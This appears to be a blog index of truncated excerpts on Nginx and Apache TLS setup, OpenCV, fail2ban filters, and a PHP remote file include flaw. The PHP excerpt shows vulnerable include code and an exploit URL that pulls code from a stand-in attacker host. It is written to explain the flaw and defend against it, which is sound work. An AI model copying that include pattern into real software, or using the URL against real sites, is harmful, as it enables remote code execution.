HTTPS/TLS on NginX and getting a certificate signed by a certificate authority

Today I decided to switch over my website to https mode and acquire a signed certificate for my website. I took the Comodo CA option and have gone for a free 30 day trial period. If things go smooth I might go ahead and purchase the certificate plan. I also learnt about three standardised different levels of validations plans from Cerificate Authorities i.e. Domain Validation : These types of certificate validations provide ssl encryption and certificate authority validates the ownership of the domain against the email address using whois record for the domain. This is the cheapest kind and the one I am using for this website at the moment. If you are committing financial transactions on your site its better to atleast get a OV certificate, which I explain next. Organisation Validation : These kind of certificate validations involve more extensive checks including in-person checks of your organisation’s details before a certificate is issued for your website. these are more secure. Extended Validation Certificates : These kind of certificates are issued after extremely intensive checks on your organisations. these are the most reliable certificates you can get. If your site uses this kind of certificate, it will get the elusive green bar in the address bar of your browser with your company name mentioned alongside. like all the bank websites get. Installing the certificate is quiet easy. First test that things work with ssl on your nginx server. First of all create directory to hold the key and certs: mkdir /etc/nginx/ssl create a key and unsigned certificate file for yourself: sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/example.com.key...

Playing with OpenCV Vision Library on Ubuntu 14.04 x86_54

I have been starting to play with OpenCV as a part of my work for security systems. I haven’t found any Perl libraries for this except Image::Resize::OpenCV, Cv::* and Image::ObjectDetect which I might look at later, for now I will start with python libraries. At a later stage I might decide to write a Perl binding for OpenCV library. No commitments yet. It depends on my needs 🙂 For starters, here is what I do: sudo apt-get install libavformat-dev libcv2.4 libhighgui2.4 python-opencv opencv-doc libcv-dev libcvaux-dev libhighgui-dev there are a few examples for python in /usr/share/doc/opencv-doc/examples/python and in /usr/share/doc/opencv-doc/examples/python2 I will start off by trying...

Setting up fail2ban for my servers

In view of increased attacks on my server from Ukraine and China I decided to harden the security on the server. After normal blocking of unused ports using the firewall, one of my favourite tools to do this job is fail2ban. The way fail2ban works is it scans your log files to look for suspected intrusion attempts or attacks and blocks the offending source. While it provides lots of sources for scanning standard log files like ssh etc. If you have a custom webapp you might have to write your own custom configuration to prevent website attacks. This is much better than using website constraints to block offending users as it prevents offending IP addresses from contacting your server entirely using the iptables instead of showing a not allowed page. To configure fail2ban, the first thing you must do is look at your webapplication logs and then note down the error message thrown by your webapp when a login attempt fails. i.e try to login with a invalid account in your website and see the error message thrown. If your app does not throw a message you will need to add some logging in your code to make sure it throws a message containing the source IP address of the user. In my case the error message is simple : Failed login from <ip address> Create a filter appropriate filter file vim /etc/fail2ban/filter.d/shantanubhadoria.conf enter the following in the file: # Fail2Ban shantanubhadoria.com filter [Definition]  failregex = Failed login from <HOST> ignoreregex = You can add more than one regex for conditions other than authentication failure to ban people from...

PHP and include url exploit

Unlike most vulnerabilities that stem from a faulty version of some app a lot of people use, this one crops up primarily on sites containing PHP code that people write themselves. Cleaning up the resulting messes is getting a little tedious and so, even though this is hardly a new exploit, I wanted to write a little bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe. Let s start with the problem code. If you ve written a PHP script on your site that contains code similar to the below, you re probably vulnerable: $page = $_GET[‘page’] . “.php”; include($page); A lot of people seem to use code like this. If they call this script exploitme.php, then the URL s for these type of sites wind up looking like this: http://example.nfshost.com/exploitme.php?page=main http://example.nfshost.com/exploitme.php?page=contact http://example.nfshost.com/exploitme.php?page=faq Then, they put the body of each page into main.php, contact.php, and faq.php. They put the stuff that s the same on every page in exploitme.php and, presto, instant mini-CMS. How does this get exploited? When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this: http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F Most people don t know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn t even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere that the hacker can put a text file. The urhacked.txt file actually contains...

Setting up Secure Socket Layer / Transport Layer Security ( SSL / TLS ) on APACHE webserver

  ssl allows relatively secure connections over http using a key ceritficate combination for the http server.to enable https connections the webserver needs to set up a ceritficate. following instructions deal with setting up ssl on a generic linux Apache server but can be geralized to most UNIX Distros. I used the Apache webserver on my Ubuntu (Hardy Heron) laptop as my testing base to set up secure socket layer (SSL). Installing OPENSSL : First step before you do anything is to install openssl in to your machine. On ubuntu openssl comes installed by default. you can check by typing the following at the command line. openssl is a useful tool that lets you generate ssl keys and certificates etc and tons of other useful stuff for ssl. $openssl if you get something like command not found etc. you need to install openss. Here are the commands for ubuntu. $sudo apt-get install openssl For fedora you might try $yum install openssl After this you would have successfully installed openssl. Getting mod_ssl : mod_ssl is the apache package that allows you to actually set up the https connections. mod_ssl depends on a installation of openssl so before you enable it make sure that openssl is pre-installed. to check if mod_ssl is installed run the following command. $ apache2 -l This should show a list of enabled apache modules however, this might not work on some systems. If that is the case you can try the following : $httpd -l Please use the apropriate paths to the bin file apache2 or httpd respectively if neither of the above works. On Ubuntu...